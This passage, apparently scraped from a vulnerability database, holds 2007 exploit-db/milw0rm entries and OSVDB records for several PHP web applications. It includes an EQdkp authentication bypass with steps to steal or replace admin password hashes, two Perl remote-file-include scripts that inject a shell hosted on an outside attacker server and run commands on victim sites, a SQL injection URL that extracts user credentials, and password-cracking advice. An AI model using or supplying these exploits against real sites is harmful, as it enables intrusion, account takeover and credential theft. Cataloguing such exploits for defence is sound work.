Eight10@gmail.com\n--------------------------------------------------------------------------------------------------------\nBackground: EQdkp is the largest DKP tracking program utilized largely by the MMORPG community, specifically\nlarge use in the World of Warcraft Community among Guild/clan Websites.\n--------------------------------------------------------------------------------------------------------\nDiscussion: A Vulnerability exists in all current versions of EQdkp that allows one to\nspoof Their refering URL to gain access to an integrated class-1 MySQL Backup/Restore program\nwhich allows one to download and modify sensitive SQL data. The script only checks for authentication\nvia refering url from the administration control panel. Note some sites have this funcitonality \ndisabled/not installed. From the EQdkp_USERS.sql file, the username/email and MD5 Hashed password can be\nobtained. From there the password needs to be cracked. \n\nTested on: 1.3.1 Default install.\n\t 1.3.0 Default install.\n---------------------------------------------------------------------------------------------------------\nExploit:\nUse a referer spoofing program, like quickspoof.\n\nRefering URL - - http://www.sitehere.com/pathtoeqdkp/admin/\nTarget URL - - http://www.sitehere.com/pathtoeqdkp/admin/backup\n\nFrom the Control menu goto \"Backup MySQL data\" and select the appropraite Database*.\nDownload eqdkp_users.sql from there and MD5 Hashes and usernames/emails will be present.\nE.g.\nVALUES ('1', 'admin', 'ec67739608318602f2dd6bcb141b56bc', 'admin@guildswebsite.com', ......\n---------------------------------------------------------------------------------------------------------\nAlternative type attack**: \nOne downloads the EQDKP_users.sql and modifies the administration hash in there to be \n\"5f4dcc3b5aa765d61d8327deb882cf99\" == password\nOne could then restore said Database and login to the EQdkp system as admin.\n\nAlternate type attack 2**:\nOne Downloads the EQDKP_users.sql and modifies the email address to his own. Then one requests\na password reset from the \"forgot my password\" page. Then the reset password is emailed to the\nnew email address.\n----------------------------------------------------------------------------------------------------------\n\nFuther Discussion: As we know people tend to use the same passwords in multiple places, especially when\nthe topics are related, for instance WoW account information and WoW clan websites. Along with similiar \npasses often used for the email address, which one can retrieve account names from the blizzards site.\nNote, when cracking, the requirements for WoW passwords, I believe it is atleast 8 characters long containing\nboth numbers and letters. These can be difficult hashes to break but when the passwords are weak dictionary words\nsimply followed by numbers, a good amount of success can be achieved. This method is especially good when\nyou already have appropriately generated rainbow tables, or hashes can be sent to online hash crackers.\n\n*Note Other databases can be obtained using this SQL backup tool too! Such as PHPBB databases.\n**(Note Sometimes Permission settings prevent SQL restores)\n\nShout Out:\nRichyPoo (Calrich AKA Faglord). Throhg (pwnt). BrowerPower. Bliznat(ty)\n _______ _________ _______ _________ __ _______ \n( ____ \\\\__ __/( ____ \\|\\ /|\\__ __// \\ ( __ )\n| ( \\/ ) ( | ( \\/| ) ( | ) ( \\/) ) | ( ) |\n| (__ | | | | | (___) | | | | | | | / |\n| __) | | | | ____ | ___ | | | | | | (/ /) |\n| ( | | | | \\_ )| ( ) | | | | | | / | |\n| (____/\\___) (___| (___) || ) ( | | | __) (_| (__) |\n(_______/\\_______/(_______)|/ \\| )_( \\____/(_______)\n\n# milw0rm.com [2007-02-02]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3252/"}, {"lastseen": "2016-01-31T18:04:36", "bulletinFamily": "exploit", "description": "phpBB ezBoard converter 0.2 (ezconvert_dir) Remote File Include Exploit. CVE-2007-0761. Webapps exploit for php platform", "modified": "2007-02-02T00:00:00", "published": "2007-02-02T00:00:00", "id": "EDB-ID:3258", "href": "https://www.exploit-db.com/exploits/3258/", "type": "exploitdb", "title": "phpBB ezBoard converter 0.2 ezconvert_dir Remote File Include Exploit", "sourceData": "# (C) xoron\n#\n# [Name: ezConvert: phpBB ezBoard converter v0.2 (ezconvert_dir) Remote File Include Exploit]\n#\n# [Author: xoron]\n# [Exploit coded by xoron]\n#\n# [Download: http://sourceforge.net/project/showfiles.php?group_id=114129]\n#\n# [xoron.biz - xoron.info]\n#\n# [www.xoron.info/bugs/ezconvert.txt]\n#\n# [Thanx: str0ke, kacper, k1tk4t, SHiKA, can bjorn]\n#\n# [Tesekkurler: chaos, pang0, DJR]\n# \n# [POC: /ezconvert/config.php?ezconvert_dir=http://evilscripts?\n#\n# [Vuln Codes: include ($ezconvert_dir . 'ezboard-parse.' . $phpEx);\n# include ($ezconvert_dir . 'phpbb-insert.' . $phpEx);\n#\n#\n$rfi = \"config.php?ezconvert_dir=\"; \n$path = \"/ezconvert/\";\n$shell = \"http://pang0.by.ru/shall/pang057.zz?cmd=\";\nprint \"Language: English // Turkish\\nPlz Select Lang:\\n\"; $dil = <STDIN>; chop($dil);\nif($dil eq \"English\"){\nprint \"(c) xoron\\n\";\n&ex;\n}\nelsif($dil eq \"Turkish\"){\nprint \"Kodlayan xoron\\n\";\n&ex;\n}\nelse {print \"Plz Select Languge\\n\"; exit;}\nsub ex{\n$not = \"Victim is Not Vunl.\\n\" and $not_cmd = \"Victim is Vunl but Not doing Exec.\\n\"\nand $vic = \"Victim Addres? with start http:// :\" and $thx = \"Greetz \" and $diz = \"Dictionary?:\" and $komt = \"Command?:\"\nif $dil eq \"English\";\n$not = \"Adreste RFI acigi Yok\\n\" and $not_cmd = \"Adresde Ac\u0102\u02ddk Var Fakat Kod Calismiyor\\n\"\nand $vic = \"Ornek Adres http:// ile baslayan:\" and $diz = \"Dizin?: \" and $thx = \"Tesekkurler \" and $komt = \"Command?:\"\nif $dil eq \"Turkish\";\nprint \"$vic\";\n$victim = <STDIN>;\nchop($victim);\nprint \"$diz\";\n$dizn = <STDIN>;\nchop($dizn);\n$dizin = $dizn;\n$dizin = \"/\" if !$dizn;\nprint \"$komt\";\n$cmd = <STDIN>;\nchop($cmd);\n$cmmd = $cmd;\n$cmmd = \"dir\" if !$cmd;\n$site = $victim;\n$site = \"http://$victim\" if !($victim =~ /http/);\n$acacaz = \"$site$dizin$rfi$shell$cmmd\";\nprint \"(c) xoron.info - xoron.biz\\n$thx: pang0, chaos, can bjorn\\n\";\nsleep 3;\nsystem(\"start $acacaz\");\n}\n\n# milw0rm.com [2007-02-02]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3258/"}, {"lastseen": "2016-01-31T18:04:20", "bulletinFamily": "exploit", "description": "dB Masters Curium CMS <= 1.03 (c_id) Remote SQL Injection Vulnerability. CVE-2007-0765. Webapps exploit for php platform", "modified": "2007-02-02T00:00:00", "published": "2007-02-02T00:00:00", "id": "EDB-ID:3256", "href": "https://www.exploit-db.com/exploits/3256/", "type": "exploitdb", "title": "dB Masters Curium CMS <= 1.03 c_id Remote SQL Injection Vulnerability", "sourceData": "*******************************************************************************\n# Title : dB Masters' Curium CMS <= 1.03(c_id) Remote Blind SQL Injection Vulnerability\n# Author : ajann\n# Contact : :(\n# S.Page : http://www.dbmasters.net\n# $$ : Free\n# Dork : Powered by dB Masters' Curium CMS 1\n# DorkEx : http://www.google.com.tr/search?q=Powered+by+dB+Masters%27+Curium+CMS+1&hl=tr&start=0&sa=N\n\n# Info : \\*Ele gecirdiginiz hash ve kullanici adi ile once siteye register\n olarak cookie ile oynayarak admin yetkisiyle login olabilirsiniz\n Upload bolumunden rahatlikla istediginiz uzantida dosyayi upload\n edebilirsiniz.Uye olurken bazilarinda maile aktivasyon gelir. \n\n#Lamerlere: \\*Bir siteye rapor yollamakla o konuda cok bilgili olduumuz anla-\n mina gelmez.Ben sahsen hicbirsey bilmedigim kanisindeyken goru-\n yorumki bircok insan hakikaten birseyi basardigini saniyor.\n Bunada burada deginmek istedim.\n Birakin sizi baskasi ovsun.\n\n*******************************************************************************\n\n[[SQL]]]---------------------------------------------------------\n\nhttp://[target]/[path]//news.php?id=-1&c_id=[SQL]\n\nExample:\n\n//news.php?id=-1&s_id=-1%20union%20select%200,1,concat(username,char(32),password),3,4,5,6,7,8,9,0%20from%20cm_users/*\n\n[[/SQL]]\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# ajann,Turkey\n# ...\n\n# Im not Hacker!\n\n# milw0rm.com [2007-02-02]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3256/"}, {"lastseen": "2016-01-31T18:03:35", "bulletinFamily": "exploit", "description": "CoD2: DreamStats <= 4.2 (index.php) Remote File Include Vulnerability. CVE-2007-0757. Webapps exploit for php platform", "modified": "2007-02-02T00:00:00", "published": "2007-02-02T00:00:00", "id": "EDB-ID:3251", "href": "https://www.exploit-db.com/exploits/3251/", "type": "exploitdb", "title": "CoD2: DreamStats <= 4.2 index.php Remote File Include Vulnerability", "sourceData": "ConTact Me:-wWw.Asb-May.Net\nScRiPt:-http://callofduty.filefront.com/file/DreamStats_System;54520\nDiscovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs TeAm}>>\n******************************************************************************\nindex.php:-\nif (!$slots) {include($rootpath . 'html/serveroffline.php');exit;}\n********************************************************************************\nExPlOiT:-http://www.Site.com/PaTh/index.php?rootpath=[Shell]\n********************************************************************************\n\n# milw0rm.com [2007-02-02]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3251/"}, {"lastseen": "2016-01-31T18:04:43", "bulletinFamily": "exploit", "description": "phpBB++ Build 100 (phpbb_root_path) Remote File Include Exploit. CVE-2007-0762. Webapps exploit for php platform", "modified": "2007-02-02T00:00:00", "published": "2007-02-02T00:00:00", "id": "EDB-ID:3259", "href": "https://www.exploit-db.com/exploits/3259/", "type": "exploitdb", "title": "phpBB++ Build 100 phpbb_root_path Remote File Include Exploit", "sourceData": "# (C) xoron\n#\n# [Name: phpBB++ (phpbb_root_path) Remote File Include Exploit]\n#\n# [Author: xoron]\n# [Exploit coded by xoron]\n#\n# [Download: http://sourceforge.net/project/showfiles.php?group_id=86688&package_id=90098]\n#\n# [xoron.biz - xoron.info]\n#\n# [Thanx: str0ke, kacper, k1tk4t, SHiKA, can bjorn]\n#\n# [Tesekkurler: chaos, pang0, DJR]\n# \n# [POC: /includes/functions.php?phpbb_root_path=http://evilscripts?]\n#\n# [Vuln Codes: include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );\n#\n#\n$rfi = \"functions.php?phpbb_root_path=\"; \n$path = \"/includes/\";\n$shell = \"http://pang0.by.ru/shall/pang057.zz?cmd=\";\nprint \"Language: English // Turkish\\nPlz Select Lang:\\n\"; $dil = <STDIN>; chop($dil);\nif($dil eq \"English\"){\nprint \"(c) xoron\\n\";\n&ex;\n}\nelsif($dil eq \"Turkish\"){\nprint \"Kodlayan xoron\\n\";\n&ex;\n}\nelse {print \"Plz Select Languge\\n\"; exit;}\nsub ex{\n$not = \"Victim is Not Vunl.\\n\" and $not_cmd = \"Victim is Vunl but Not doing Exec.\\n\"\nand $vic = \"Victim Addres? with start http:// :\" and $thx = \"Greetz \" and $diz = \"Dictionary?:\" and $komt = \"Command?:\"\nif $dil eq \"English\";\n$not = \"Adreste RFI acigi Yok\\n\" and $not_cmd = \"Adresde Ac\u0102\u02ddk Var Fakat Kod Calismiyor\\n\"\nand $vic = \"Ornek Adres http:// ile baslayan:\" and $diz = \"Dizin?: \" and $thx = \"Tesekkurler \" and $komt = \"Command?:\"\nif $dil eq \"Turkish\";\nprint \"$vic\";\n$victim = <STDIN>;\nchop($victim);\nprint \"$diz\";\n$dizn = <STDIN>;\nchop($dizn);\n$dizin = $dizn;\n$dizin = \"/\" if !$dizn;\nprint \"$komt\";\n$cmd = <STDIN>;\nchop($cmd);\n$cmmd = $cmd;\n$cmmd = \"dir\" if !$cmd;\n$site = $victim;\n$site = \"http://$victim\" if !($victim =~ /http/);\n$acacaz = \"$site$dizin$rfi$shell$cmmd\";\nprint \"(c) xoron.info - xoron.biz\\n$thx: pang0, chaos, can bjorn\\n\";\nsleep 3;\nsystem(\"start $acacaz\");\n}\n\n# milw0rm.com [2007-02-02]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3259/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:23768](https://secuniaresearch.flexerasoftware.com/advisories/23768/)\nOther Advisory URL: http://milw0rm.com/exploits/3134\nISS X-Force ID: 31508\nFrSIRT Advisory: ADV-2007-0228\n[CVE-2007-0337](https://vulners.com/cve/CVE-2007-0337)\nBugtraq ID: 22065\n", "modified": "2007-01-15T00:00:00", "published": "2007-01-15T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:31585", "id": "OSVDB:31585", "title": "KGB sesskglogadmin.php skinnn Local File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nOther Advisory URL: http://www.xoron.info/bugs/ezconvert.txt\nMail List Post: http://www.attrition.org/pipermail/vim/2007-February/001278.html\nISS X-Force ID: 32157\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3258\nFrSIRT Advisory: ADV-2007-0473\n[CVE-2007-0761](https://vulners.com/cve/CVE-2007-0761)\n", "modified": "2007-02-02T04:22:33", "published": "2007-02-02T04:22:33", "href": "https://vulners.com/osvdb/OSVDB:33645", "id": "OSVDB:33645", "title": "phpBB ezBoard converter (ezconvert) config.php ezconvert_dir Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.eqdkp.com/\n[Secunia Advisory ID:24038](https://secuniaresearch.flexerasoftware.com/advisories/24038/)\nOther Advisory URL: http://milw0rm.com/exploits/3252\nISS X-Force ID: 32152\n[CVE-2007-0760](https://vulners.com/cve/CVE-2007-0760)\nBugtraq ID: 20805\n", "modified": "2007-02-02T10:03:45", "published": "2007-02-02T10:03:45", "href": "https://vulners.com/osvdb/OSVDB:33112", "id": "OSVDB:33112", "title": "EQdkp HTTP Referer Header Administrative Request Authentication Bypass", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Manual Testing Notes\n/news.php?id=-1&s_id=-1%20union%20select%200,1,concat(username,char(32),password),3,4,5,6,7,8,9,0%20from%20cm_users/*\n## References:\nVendor URL: http://www.dbmasters.net/\n[Secunia Advisory ID:24032](https://secuniaresearch.flexerasoftware.com/advisories/24032/)\nOther Advisory URL: http://milw0rm.com/exploits/3256\nISS X-Force ID: 32148\nFrSIRT Advisory: ADV-2007-0474\n[CVE-2007-0765](https://vulners.com/cve/CVE-2007-0765)\nBugtraq ID: 22373\n", "modified": "2007-02-02T09:03:45", "published": "2007-02-02T09:03:45", "href": "https://vulners.com/osvdb/OSVDB:33111", "id": "OSVDB:33111", "title": "dB Masters Curium CMS news.php c_id Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/PaTh/index.php?rootpath=[Shell]\n## References:\n[Secunia Advisory ID:24037](https://secuniaresearch.flexerasoftware.com/advisories/24037/)\nOther Advisory URL: http://milw0rm.com/exploits/3251\nMail List Post: http://attrition.org/pipermail/vim/2007-February/001272.html\nISS X-Force ID: 32160\nFrSIRT Advisory: ADV-2007-0479\n[CVE-2007-0757](https://vulners.com/cve/CVE-2007-0757)\nBugtraq ID: 22371\n", "modified": "2007-02-02T12:03:45", "published": "2007-02-02T12:03:45", "href": "https://vulners.com/osvdb/OSVDB:33095", "id": "OSVDB:33095", "title": "DreamStats index.php rootpath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 32188\nGeneric Exploit URL: http://milw0rm.com/exploits/3255\n[CVE-2007-0763](https://vulners.com/cve/CVE-2007-0763)\nBugtraq ID: 22379\n", "modified": "2007-02-02T02:41:57", "published": "2007-02-02T02:41:57", "href": "https://vulners.com/osvdb/OSVDB:34668", "id": "OSVDB:34668", "title": "F3Site News Comment Function Autor Field XSS", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 32189\nGeneric Exploit URL: http://milw0rm.com/exploits/3255\n[CVE-2007-0764](https://vulners.com/cve/CVE-2007-0764)\n", "modified": "2007-02-02T03:54:14", "published": "2007-02-02T03:54:14", "href": "https://vulners.com/osvdb/OSVDB:34669", "id": "OSVDB:34669", "title": "F3Site GIF86 Header Unrestricted File Upload Arbitrary Code Execution", "type": "osvdb", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24034](https://secuniaresearch.flexerasoftware.com/advisories/24034/)\nOther Advisory URL: http://milw0rm.com/exploits/3259\nMail List Post: http://www.attrition.org/pipermail/vim/2007-February/001279.html\nISS X-Force ID: 32159\nFrSIRT Advisory: ADV-2007-0472\n[CVE-2007-0762](https://vulners.com/cve/CVE-2007-0762)\nBugtraq ID: 22376\n", "modified": "2007-02-02T11:03:47", "published": "2007-02-02T11:03:47", "href": "https://vulners.com/osvdb/OSVDB:33092", "id": "OSVDB:33092", "title": "phpBB++ includes/functions.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}